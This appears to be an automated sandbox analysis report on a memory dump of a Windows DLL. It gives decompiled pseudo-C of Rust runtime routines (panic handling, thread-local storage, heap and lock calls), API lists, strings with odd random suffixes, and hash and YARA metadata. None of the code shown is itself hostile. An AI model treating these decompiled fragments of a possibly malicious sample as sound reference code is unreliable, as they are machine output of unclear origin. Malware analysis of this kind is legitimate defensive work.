					_t193 = E6ED395A0(_t268,  &M6ED5F8F7, 0x46, _t349,  &_v68, 0x6ed5f870, 0x6ed5f9bc);
					_t348 = _t348 + 0xc;
					asm("ud2");
				}
				_t314 = _a8;
				_t278 =  *_t193 + 1;
				 *_t193 = _t278;
				if(_t340 < 0 || _t278 >= 3) {
					__eflags = _t278 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6ed5f570;
						_v120 = 0x6ed5f824;
						_v68 = 0x6ed60260;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t314;
						_t315 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6ED12470;
						_v52 =  &_v80;
						_v48 = 1;
						_t197 = E6ED1D0F0( &_v100, __eflags);
						__eflags = _t197 - 3;
						if(_t197 == 3) {
							_v20 = 0;
							_v36 = _t315;
							 *((intOrPtr*)( *((intOrPtr*)(_t315 + 4))))( *_t315);
							_t348 = _t348 + 4;
							L12:
							_t340 = _v36;
							_t307 =  *(_t340 + 4);
							__eflags =  *(4 + _t307);
							if( *(4 + _t307) != 0) {
								HeapFree( *0x6ed6e128, 0, _t259);
							}
							_t197 = HeapFree( *0x6ed6e128, 0, _t340);
						}
						goto L17;
					}
					_t333 =  &_v68;
					_v68 = 0x6ed60224;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6ed5f570;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t197 = E6ED1D0F0( &_v124, __eflags);
					__eflags = _t197 - 3;
					if(_t197 != 3) {
						goto L17;
					} else {
						_v20 = 1;
						_v36 = _t333;
						 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
						_t348 = _t348 + 4;
						goto L12;
					}
				} else {
					_v132 = _t278;
					__imp__AcquireSRWLockShared(0x6ed6e11c);
					_v144 = 0x6ed6e11c;
					_v20 = 2;
					_v136 = _t268;
					_v140 = _t337;
					_t263 =  *((intOrPtr*)(_t337 + 0x10))(_t268);
					_t348 = _t348 + 4;
					_v36 = _t263;
					_v40 = _t314;
					_t197 = E6ED1D000(_t268, _t337);
					_t337 = _v40;
					_t352 = _t197;
					if(_t197 != 0) {
						L18:
						__eflags =  *_t197 - 1;
						_t280 = 1;
						if( *_t197 <= 1) {
							_t198 =  *0x6ed6e110; // 0x0
							_t316 = _a8;
							__eflags = _t198 - 2;
							if(_t198 == 2) {
								_t280 = 0;
								goto L20;
							}
							__eflags = _t198 - 1;
							if(_t198 == 1) {
								_t280 = 4;
								goto L20;
							}
							__eflags = _t198;
							if(_t198 != 0) {
								goto L20;
							}
							E6ED1D380(_t268,  &_v68, _t337, _t340);
							_t337 = _v40;
							_t251 = _v68;
							__eflags = _t251;
							if(_t251 != 0) {
								goto L69;
							}
							_t271 = 5;
							goto L87;
						}
						_t316 = _a8;
						goto L20;
					} else {
						E6ED395A0(_t268,  &M6ED5F8F7, 0x46, _t352,  &_v68, 0x6ed5f870, 0x6ed5f9bc);
						_t348 = _t348 + 0xc;
						L62:
						asm("ud2");
						L63:
						_t281 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t204 = 0xc;
						L22:
						_v100 = _t281;
						_v96 = _t204;
						_t205 =  *0x6ed6d044; // 0x0
						if(_t205 == 0) {
							_t285 = 0x6ed6d044;
							_t205 = E6ED22960(_t268, 0x6ed6d044, _t337, _t340);
						}
						_t197 = TlsGetValue(_t205);
						if(_t197 <= 1) {
							L43:
							_t206 =  *0x6ed6d044; // 0x0
							__eflags = _t206;
							if(_t206 == 0) {
								_t285 = 0x6ed6d044;
								_t206 = E6ED22960(_t268, 0x6ed6d044, _t337, _t340);
							}
							_t197 = TlsGetValue(_t206);
							__eflags = _t197;
							if(_t197 == 0) {
								_t207 =  *0x6ed6e128; // 0x1390000
								__eflags = _t207;
								if(_t207 != 0) {
									L67:
									_t208 = HeapAlloc(_t207, 0, 0x10);
									__eflags = _t208;
									if(__eflags != 0) {
										 *_t208 = 0;
										 *(_t208 + 0xc) = 0x6ed6d044;
										_t340 = _t208;
										_t209 =  *0x6ed6d044; // 0x0
										__eflags = _t209;
										if(_t209 == 0) {
											_v36 = _t340;
											_t209 = E6ED22960(_t268, 0x6ed6d044, _t337, _t340);
											_t340 = _v36;
										}
										_t197 = TlsSetValue(_t209, _t340);
										goto L76;
									}
									L68:
									_t251 = E6ED392F0(_t268, 0x10, 4, _t337, _t340, __eflags);
									asm("ud2");
									L69:
									_t332 = _v60;
									_t303 = _v64;
									__eflags = _t332 - 4;
									if(_t332 == 4) {
										__eflags =  *_t251 - 0x6c6c7566;
										if( *_t251 != 0x6c6c7566) {
											L84:
											_t340 = 2;
											_t271 = 0;
											__eflags = 0;
											L85:
											__eflags = _t303;
											if(_t303 != 0) {
												HeapFree( *0x6ed6e128, 0, _t251);
											}
											L87:
											__eflags = _t271 - 5;
											_t316 = _a8;
											_t273 =  !=  ? _t340 : 1;
											_t280 =  !=  ? _t271 & 0x000000ff : 4;
											_t144 =  !=  ? _t340 : 1;
											_t268 =  *0x6ed6e110;
											 *0x6ed6e110 =  !=  ? _t340 : 1;
											L20:
											_v148 = _t316;
											_v128 = _t280;
											_t61 = _t337 + 0xc; // 0x6ed23290
											_t199 =  *_t61;
											_v40 = _t199;
											_t200 =  *_t199(_v36);
											_t348 = _t348 + 4;
											_t318 = _t316 ^ 0x7ef2a91e | _t200 ^ 0xecc7bcf4;
											__eflags = _t318;
											if(__eflags != 0) {
												_t202 = _v40(_v36);
												_t348 = _t348 + 4;
												__eflags = _t318 ^ 0xe43a67d8 | _t202 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L63;
												}
												_t254 = _v36;
												_t281 =  *_t254;
												_t204 = _t254[2];
												goto L22;
											}
											_t255 = _v36;
											_t281 =  *_t255;
											_t204 = _t255[1];
											goto L22;
										}
										_t271 = 1;
										_t340 = 3;
										goto L85;
									}
									__eflags = _t332 - 1;
									if(_t332 != 1) {
										goto L84;
									}
									__eflags =  *_t251 - 0x30;
									if( *_t251 != 0x30) {
										goto L84;
									}
									_t271 = 4;
									_t340 = 1;
									goto L85;
								}
								_t207 = GetProcessHeap();
								__eflags = _t207;
								if(__eflags == 0) {
									goto L68;
								}
								 *0x6ed6e128 = _t207;
								goto L67;
							} else {
								_t340 = _t197;
								__eflags = _t197 - 1;
								if(_t197 != 1) {
									L76:
									_t282 =  *(_t340 + 8);
									__eflags =  *_t340;
									_t138 = _t340 + 4; // 0x4
									_t337 = _t138;
									 *_t340 = 1;
									 *(_t340 + 4) = 0;
									 *(_t340 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t282;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t197 = E6ED1C640(_t282);
											}
										}
									}
									goto L27;
								}
								_v84 = 0;
								_v36 = 0;
								_t213 = 0;
								__eflags = 0;
								goto L48;
							}
						} else {
							_t337 = _t197;
							if( *_t197 != 1) {
								goto L43;
							}
							_t337 = _t337 + 4;
							L27:
							if( *_t337 != 0) {
								E6ED395A0(_t268, "already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd", 0x10, __eflags,  &_v68, 0x6ed5f860, 0x6ed5ff30);
								_t348 = _t348 + 0xc;
								goto L62;
							}
							 *_t337 = 0xffffffff;
							_t340 =  *(_t337 + 4);
							if(_t340 == 0) {
								_v36 = _t337;
								_v20 = 8;
								_t250 = E6ED1C4D0(_t268, _t337, _t340);
								_t337 = _v36;
								_t340 = _t250;
								_t197 =  *(_t337 + 4);
								_t359 = _t197;
								if(_t359 != 0) {
									asm("lock dec dword [eax]");
									if(_t359 == 0) {
										_t285 =  *(_t337 + 4);
										_t197 = E6ED1C640(_t285);
									}
								}
								 *(_t337 + 4) = _t340;
							}
							asm("lock inc dword [esi]");
							if(_t359 <= 0) {
								L17:
								asm("ud2");
								asm("ud2");
								goto L18;
							} else {
								 *_t337 =  *_t337 + 1;
								_v84 = _t340;
								_v36 = _t340;
								if(_t340 != 0) {
									_t212 =  *(_t340 + 0x10);
									__eflags = _t212;
									_t285 =  ==  ? _t212 : _t340 + 0x10;
									__eflags = _t285;
									if(__eflags != 0) {
										L104:
										_t213 =  *_t285;
										_t285 =  *((intOrPtr*)(4 + _t285)) - 1;
										L105:
										_v20 = 3;
										L48:
										_v124 = 0x6ed6010c;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t323 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t215 =  !=  ? _t285 : 9;
										_v80 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t324 =  &_v124;
										_v76 =  !=  ? _t285 : 9;
										_v68 =  &_v80;
										_v64 = 0x6ed1dca0;
										_v60 =  &_v100;
										_v56 = 0x6ed1dca0;
										_v52 =  &_v148;
										_v48 = E6ED1DCC0;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6ED1D0F0( &_v92, _t213) == 3) {
											_v20 = 7;
											_v40 = _t324;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t348 = _t348 + 4;
											_t343 = _v40;
											_t300 =  *((intOrPtr*)(_t343 + 4));
											if( *((intOrPtr*)(_t300 + 4)) != 0) {
												_t248 =  *_t343;
												if( *((intOrPtr*)(_t300 + 8)) >= 9) {
													_t248 =  *(_t248 - 4);
												}
												HeapFree( *0x6ed6e128, 0, _t248);
											}
											HeapFree( *0x6ed6e128, 0, _t343);
										}
										_t269 = _v128;
										_t222 =  <  ? (_t269 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t222 == 0) {
											__imp__AcquireSRWLockExclusive(0x6ed6e10c);
											_v68 = 0x6ed5fad0;
											_v64 = 1;
											_v152 = 0x6ed6e10c;
											_v41 = _t269;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6ED1DD30;
											_v52 =  &_v124;
											_v48 = 1;
											_t225 = E6ED1D0F0( &_v92, __eflags);
											_t341 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6ed6e10c);
											__eflags = _t225 - 3;
											if(__eflags != 0) {
												goto L95;
											}
											_v20 = 5;
											_v40 = _t341;
											 *((intOrPtr*)( *((intOrPtr*)(_t341 + 4))))( *_t341);
											_t348 = _t348 + 4;
											goto L90;
										} else {
											if(_t222 == 1) {
												L95:
												_t372 = _v36;
												if(_t372 != 0) {
													asm("lock dec dword [eax]");
													if(_t372 == 0) {
														E6ED1C640(_v84);
													}
												}
												_t342 = _v140;
												_t338 = _v136;
												_t373 = _v72;
												if(_t373 != 0) {
													asm("lock dec dword [eax]");
													if(_t373 == 0) {
														E6ED1DA70(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6ed6e11c);
												_t374 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6ed6029c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6ed5f570;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t229 = E6ED1D0F0( &_v80, _t374);
													_v120 =  &_v68;
													_v124 = _t229;
													E6ED1D2B0( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t285 = _t338;
												E6ED1D290(_t285, _t342);
												asm("ud2");
												goto L104;
											}
											 *0x6ed6d040 = 0;
											_t368 =  *0x6ed6d040;
											if( *0x6ed6d040 == 0) {
												goto L95;
											}
											_t330 =  &_v68;
											_v68 = 0x6ed6017c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6ed5f570;
											_v48 = 0;
											_v20 = 3;
											if(E6ED1D0F0( &_v92, _t368) != 3) {
												goto L95;
											}
											_v40 = _t330;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t330 + 4))))( *_t330);
											_t348 = _t348 + 4;
											L90:
											_t296 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t296 + 4)) != 0) {
												_t238 =  *_v40;
												if( *((intOrPtr*)(_t296 + 8)) >= 9) {
													_t238 =  *(_t238 - 4);
												}
												HeapFree( *0x6ed6e128, 0, _t238);
											}
											HeapFree( *0x6ed6e128, 0, _v40);
											goto L95;
										}
									}
									_t213 = 0;
									goto L105;
								}
								_t213 = 0;
								goto L48;
							}
						}
					}
				}
			}

0x6ed1c6d7
0x6ed1c6da
0x6ed1c6de
0x6ed1c6e5
0x6ed1c6e6
0x6ed1c6e8
0x6ed1c6ed
0x6ed1c6f0
0x6ed1c6f2
0x6ed1c6f3
0x6ed1c6f4
0x6ed1c6f5
0x6ed1c6f6
0x6ed1c6f7
0x6ed1c6f8
0x6ed1c6f9
0x6ed1c6fa
0x6ed1c6fb
0x6ed1c6fc
0x6ed1c6fd
0x6ed1c6fe
0x6ed1c6ff
0x6ed1c706
0x6ed1c70c
0x6ed1c70f
0x6ed1c716
0x6ed1c71d
0x6ed1c722
0x6ed1c727
0x6ed1c730
0x6ed1c733
0x6ed1c739
0x6ed1c741
0x6ed1c746
0x6ed1c748
0x6ed1c762
0x6ed1c767
0x6ed1c76a
0x6ed1c76a
0x6ed1c76e
0x6ed1c771
0x6ed1c774
0x6ed1c776
0x6ed1c7ea
0x6ed1c7ed
0x6ed1c84a
0x6ed1c851
0x6ed1c85b
0x6ed1c862
0x6ed1c869
0x6ed1c86d
0x6ed1c874
0x6ed1c87b
0x6ed1c881
0x6ed1c884
0x6ed1c887
0x6ed1c88d
0x6ed1c894
0x6ed1c897
0x6ed1c89e
0x6ed1c8a3
0x6ed1c8a5
0x6ed1c8ac
0x6ed1c8b4
0x6ed1c8b7
0x6ed1c8b9
0x6ed1c8bc
0x6ed1c8bc
0x6ed1c8bf
0x6ed1c8c2
0x6ed1c8c6
0x6ed1c8dc
0x6ed1c8dc
0x6ed1c8ea
0x6ed1c8ea
0x00000000
0x6ed1c8a5
0x6ed1c7f2
0x6ed1c7f5
0x6ed1c7fc
0x6ed1c803
0x6ed1c80a
0x6ed1c811
0x6ed1c815
0x6ed1c81c
0x6ed1c823
0x6ed1c828
0x6ed1c82a
0x00000000
0x6ed1c830
0x6ed1c835
0x6ed1c83d
0x6ed1c840
0x6ed1c842
0x00000000
0x6ed1c842
0x6ed1c77d
0x6ed1c77d
0x6ed1c785
0x6ed1c78b
0x6ed1c795
0x6ed1c79c
0x6ed1c7a3
0x6ed1c7a9
0x6ed1c7ac
0x6ed1c7af
0x6ed1c7b2
0x6ed1c7b5
0x6ed1c7ba
0x6ed1c7bd
0x6ed1c7bf
0x6ed1c8f3
0x6ed1c8f3
0x6ed1c8f6
0x6ed1c8f8
0x6ed1c9cb
0x6ed1c9d0
0x6ed1c9d3
0x6ed1c9d6
0x6ed1cbd7
0x00000000
0x6ed1cbd7
0x6ed1c9dc
0x6ed1c9df
0x6ed1cbd0
0x00000000
0x6ed1cbd0
0x6ed1c9e5
0x6ed1c9e7
0x00000000
0x00000000
0x6ed1c9f0
0x6ed1c9f5
0x6ed1c9f8
0x6ed1c9fb
0x6ed1c9fd
0x00000000
0x00000000
0x6ed1ca03
0x00000000
0x6ed1ca03
0x6ed1c8fe
0x00000000
0x6ed1c7c5
0x6ed1c7dd
0x6ed1c7e2
0x6ed1cbfe
0x6ed1cbfe
0x6ed1cc00
0x6ed1cc00
0x6ed1cc05
0x6ed1c933
0x6ed1c933
0x6ed1c936
0x6ed1c939
0x6ed1c940
0x6ed1c942
0x6ed1c947
0x6ed1c947
0x6ed1c94d
0x6ed1c956
0x6ed1ca33
0x6ed1ca33
0x6ed1ca38
0x6ed1ca3a
0x6ed1ca3c
0x6ed1ca41
0x6ed1ca41
0x6ed1ca47
0x6ed1ca4d
0x6ed1ca4f
0x6ed1cc0f
0x6ed1cc14
0x6ed1cc16
0x6ed1cc26
0x6ed1cc2b
0x6ed1cc30
0x6ed1cc32
0x6ed1cc72
0x6ed1cc78
0x6ed1cc7f
0x6ed1cc81
0x6ed1cc86
0x6ed1cc88
0x6ed1cc8f
0x6ed1cc92
0x6ed1cc97
0x6ed1cc97
0x6ed1cc9c
0x00000000
0x6ed1cc9c
0x6ed1cc34
0x6ed1cc3e
0x6ed1cc43
0x6ed1cc45
0x6ed1cc45
0x6ed1cc48
0x6ed1cc4b
0x6ed1cc4e
0x6ed1ccf8
0x6ed1ccfe
0x6ed1cd09
0x6ed1cd09
0x6ed1cd0e
0x6ed1cd0e
0x6ed1cd10
0x6ed1cd10
0x6ed1cd12
0x6ed1cd1d
0x6ed1cd1d
0x6ed1cd22
0x6ed1cd22
0x6ed1cd2d
0x6ed1cd35
0x6ed1cd38
0x6ed1cd3b
0x6ed1cd3b
0x6ed1cd3b
0x6ed1c901
0x6ed1c901
0x6ed1c907
0x6ed1c90a
0x6ed1c90a
0x6ed1c910
0x6ed1c913
0x6ed1c915
0x6ed1c923
0x6ed1c923
0x6ed1c925
0x6ed1ca0d
0x6ed1ca10
0x6ed1ca1e
0x6ed1ca20
0x00000000
0x00000000
0x6ed1ca26
0x6ed1ca29
0x6ed1ca2b
0x00000000
0x6ed1ca2b
0x6ed1c92b
0x6ed1c92e
0x6ed1c930
0x00000000
0x6ed1c930
0x6ed1cd00
0x6ed1cd02
0x00000000
0x6ed1cd02
0x6ed1cc54
0x6ed1cc57
0x00000000
0x00000000
0x6ed1cc5d
0x6ed1cc60
0x00000000
0x00000000
0x6ed1cc66
0x6ed1cc68
0x00000000
0x6ed1cc68
0x6ed1cc18
0x6ed1cc1d
0x6ed1cc1f
0x00000000
0x00000000
0x6ed1cc21
0x00000000
0x6ed1ca55
0x6ed1ca55
0x6ed1ca57
0x6ed1ca5a
0x6ed1cca2
0x6ed1cca2
0x6ed1cca5
0x6ed1cca8
0x6ed1cca8
0x6ed1ccab
0x6ed1ccb1
0x6ed1ccb8
0x6ed1ccbf
0x6ed1ccc5
0x6ed1ccc7
0x6ed1cccd
0x6ed1ccd0
0x6ed1ccd6
0x6ed1ccd6
0x6ed1ccd0
0x6ed1ccc7
0x00000000
0x6ed1ccbf
0x6ed1ca60
0x6ed1ca67
0x6ed1ca6e
0x6ed1ca6e
0x00000000
0x6ed1ca6e
0x6ed1c95c
0x6ed1c95f
0x6ed1c961
0x00000000
0x00000000
0x6ed1c967
0x6ed1c96a
0x6ed1c96d
0x6ed1cbf6
0x6ed1cbfb
0x00000000
0x6ed1cbfb
0x6ed1c973
0x6ed1c979
0x6ed1c97e
0x6ed1c980
0x6ed1c983
0x6ed1c98a
0x6ed1c98f
0x6ed1c992
0x6ed1c994
0x6ed1c997
0x6ed1c999
0x6ed1c99b
0x6ed1c99e
0x6ed1c9a0
0x6ed1c9a3
0x6ed1c9a3
0x6ed1c99e
0x6ed1c9a8
0x6ed1c9a8
0x6ed1c9ab
0x6ed1c9ae
0x6ed1c8ef
0x6ed1c8ef
0x6ed1c8f1
0x00000000
0x6ed1c9b4
0x6ed1c9b4
0x6ed1c9b8
0x6ed1c9bb
0x6ed1c9be
0x6ed1cce0
0x6ed1cce6
0x6ed1cce8
0x6ed1cce8
0x6ed1cceb
0x6ed1cea2
0x6ed1cea2
0x6ed1cea7
0x6ed1cea8
0x6ed1cea8
0x6ed1ca70
0x6ed1ca77
0x6ed1ca7e
0x6ed1ca85
0x6ed1ca8c
0x6ed1ca90
0x6ed1ca97
0x6ed1ca9e
0x6ed1caa5
0x6ed1caad
0x6ed1cab0
0x6ed1cab6
0x6ed1cab9
0x6ed1cabf
0x6ed1cac5
0x6ed1cacc
0x6ed1cad5
0x6ed1cadc
0x6ed1cae2
0x6ed1cae9
0x6ed1caec
0x6ed1cafa
0x6ed1cb01
0x6ed1cb09
0x6ed1cb0c
0x6ed1cb0e
0x6ed1cb11
0x6ed1cb14
0x6ed1cb1b
0x6ed1cb1d
0x6ed1cb23
0x6ed1cb25
0x6ed1cb25
0x6ed1cb31
0x6ed1cb31
0x6ed1cb3f
0x6ed1cb3f
0x6ed1cb44
0x6ed1cb55
0x6ed1cb5a
0x6ed1cd4b
0x6ed1cd5a
0x6ed1cd61
0x6ed1cd68
0x6ed1cd72
0x6ed1cd75
0x6ed1cd7c
0x6ed1cd83
0x6ed1cd89
0x6ed1cd90
0x6ed1cd93
0x6ed1cd9a
0x6ed1cd9f
0x6ed1cda8
0x6ed1cdae
0x6ed1cdb1
0x00000000
0x00000000
0x6ed1cdb8
0x6ed1cdc0
0x6ed1cdc3
0x6ed1cdc5
0x00000000
0x6ed1cb60
0x6ed1cb63
0x6ed1ce00
0x6ed1ce03
0x6ed1ce05
0x6ed1ce07
0x6ed1ce0a
0x6ed1ce0f
0x6ed1ce0f
0x6ed1ce0a
0x6ed1ce17
0x6ed1ce1d
0x6ed1ce23
0x6ed1ce25
0x6ed1ce27
0x6ed1ce2a
0x6ed1ce2f
0x6ed1ce2f
0x6ed1ce2a
0x6ed1ce39
0x6ed1ce3f
0x6ed1ce43
0x6ed1ce4a
0x6ed1ce52
0x6ed1ce59
0x6ed1ce60
0x6ed1ce67
0x6ed1ce6e
0x6ed1ce72
0x6ed1ce79
0x6ed1ce80
0x6ed1ce88
0x6ed1ce8b
0x6ed1ce8e
0x6ed1ce93
0x6ed1ce95
0x6ed1ce95
0x6ed1ce97
0x6ed1ce9b
0x6ed1cea0
0x00000000
0x6ed1cea0
0x6ed1cb6b
0x6ed1cb71
0x6ed1cb73
0x00000000
0x00000000
0x6ed1cb7c
0x6ed1cb7f
0x6ed1cb86
0x6ed1cb8d
0x6ed1cb94
0x6ed1cb9b
0x6ed1cba2
0x6ed1cbb0
0x00000000
0x00000000
0x6ed1cbbb
0x6ed1cbbe
0x6ed1cbc6
0x6ed1cbc8
0x6ed1cdc8
0x6ed1cdcb
0x6ed1cdd2
0x6ed1cddb
0x6ed1cddd
0x6ed1cddf
0x6ed1cddf
0x6ed1cdeb
0x6ed1cdeb
0x6ed1cdfb
0x00000000
0x6ed1cdfb
0x6ed1cb5a
0x6ed1ccf1
0x00000000
0x6ed1ccf1
0x6ed1c9c4
0x00000000
0x6ed1c9c4
0x6ed1c9ae
0x6ed1c956
0x6ed1c7bf

APIs

Part of subcall function 6ED1C700: AcquireSRWLockShared.KERNEL32(6ED6E11C), ref: 6ED1C785

HeapFree.KERNEL32(00000000,00000000), ref: 6ED1C8DC
HeapFree.KERNEL32(00000000,?), ref: 6ED1C8EA
TlsGetValue.KERNEL32(00000000), ref: 6ED1C94D
HeapFree.KERNEL32(00000000,00000000), ref: 6ED1CB31
HeapFree.KERNEL32(00000000,?), ref: 6ED1CB3F

Strings

Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6ED1CC00
cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa, xrefs: 6ED1C74D, 6ED1C7C8

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$AcquireLockSharedValue
String ID: Box<dyn Any><unnamed>thread '' panicked at '', $cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa
API String ID: 942675266-716947571
Opcode ID: 3283834f1ced67d5f6fe5a51e9f10e7ee1fb5f300a41119452e5af4dbd042e20
Instruction ID: e5e88e3e019c4fc3f194b90922fba372e5f8f96c01e6937b4d559511ab540c38
Opcode Fuzzy Hash: 3283834f1ced67d5f6fe5a51e9f10e7ee1fb5f300a41119452e5af4dbd042e20
Instruction Fuzzy Hash: 400212B0A08219CFEB14CFE4D894BDEBBB5BF49308F204529D455AB380DB75A946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C340, Relevance: 12.6, APIs: 10, Instructions: 125COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?), ref: 6ED1C37A
TlsSetValue.KERNEL32(?,00000000), ref: 6ED1C387
TlsGetValue.KERNEL32(?), ref: 6ED1C3CA
TlsSetValue.KERNEL32(?,00000000), ref: 6ED1C3D7
TlsGetValue.KERNEL32(?), ref: 6ED1C40A
TlsSetValue.KERNEL32(?,00000000), ref: 6ED1C417
TlsGetValue.KERNEL32(?), ref: 6ED1C44A
TlsSetValue.KERNEL32(?,00000000), ref: 6ED1C457
TlsGetValue.KERNEL32(?), ref: 6ED1C48B
TlsSetValue.KERNEL32(?,00000000), ref: 6ED1C498

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: b6bbe5526e8e211aab4c795bc8c519bbcc28d6acbc4c1a2640cecca2950e30bf
Instruction ID: 978c05338a853e997eb6b23d14e612d34d565cf08f375223ad0d35ac4b3bd81a
Opcode Fuzzy Hash: b6bbe5526e8e211aab4c795bc8c519bbcc28d6acbc4c1a2640cecca2950e30bf
Instruction Fuzzy Hash: D3418E3124C259EFEB54AFE4FC15BEA3724AF13B40F044034EE644E155E761EA61EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ED21BF0, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 212fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,?,?,?,6ED21A7E,?), ref: 6ED21C05
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6ED21A7E,?), ref: 6ED21C16
GetConsoleMode.KERNEL32(00000000,?), ref: 6ED21C58
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6ED21CD3
GetLastError.KERNEL32(?,?,?,00000000), ref: 6ED21D55

Strings

Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx, xrefs: 6ED21E45
assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb, xrefs: 6ED21E5E

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$ConsoleFileHandleModeWrite
String ID: Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx$assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb
API String ID: 4172320683-1866377508
Opcode ID: 04fffbc1d033fe2e61c404af08718425c73055bcc9282246092e5a03e02ff660
Instruction ID: 8d9f0a2314a07edade5d88b526b4305e641b4e11bd5471b60d4e79f2496db6d7
Opcode Fuzzy Hash: 04fffbc1d033fe2e61c404af08718425c73055bcc9282246092e5a03e02ff660
Instruction Fuzzy Hash: 6B71C0B0A08305DFD7248FA4D85076ABBE5AB8634CF10C83DE5E68B384D732D94D8B12

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C4D0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6ED6E108), ref: 6ED1C509
ReleaseSRWLockExclusive.KERNEL32(6ED6E108), ref: 6ED1C553
GetProcessHeap.KERNEL32 ref: 6ED1C562
HeapAlloc.KERNEL32(01390000,00000000,00000020), ref: 6ED1C575
ReleaseSRWLockExclusive.KERNEL32(6ED6E108), ref: 6ED1C5C7

Strings

failed to generate unique thread ID: bitspace exhausted, xrefs: 6ED1C5D4
called `Option::unwrap()` on a `None` value, xrefs: 6ED1C5F7

Memory Dump Source

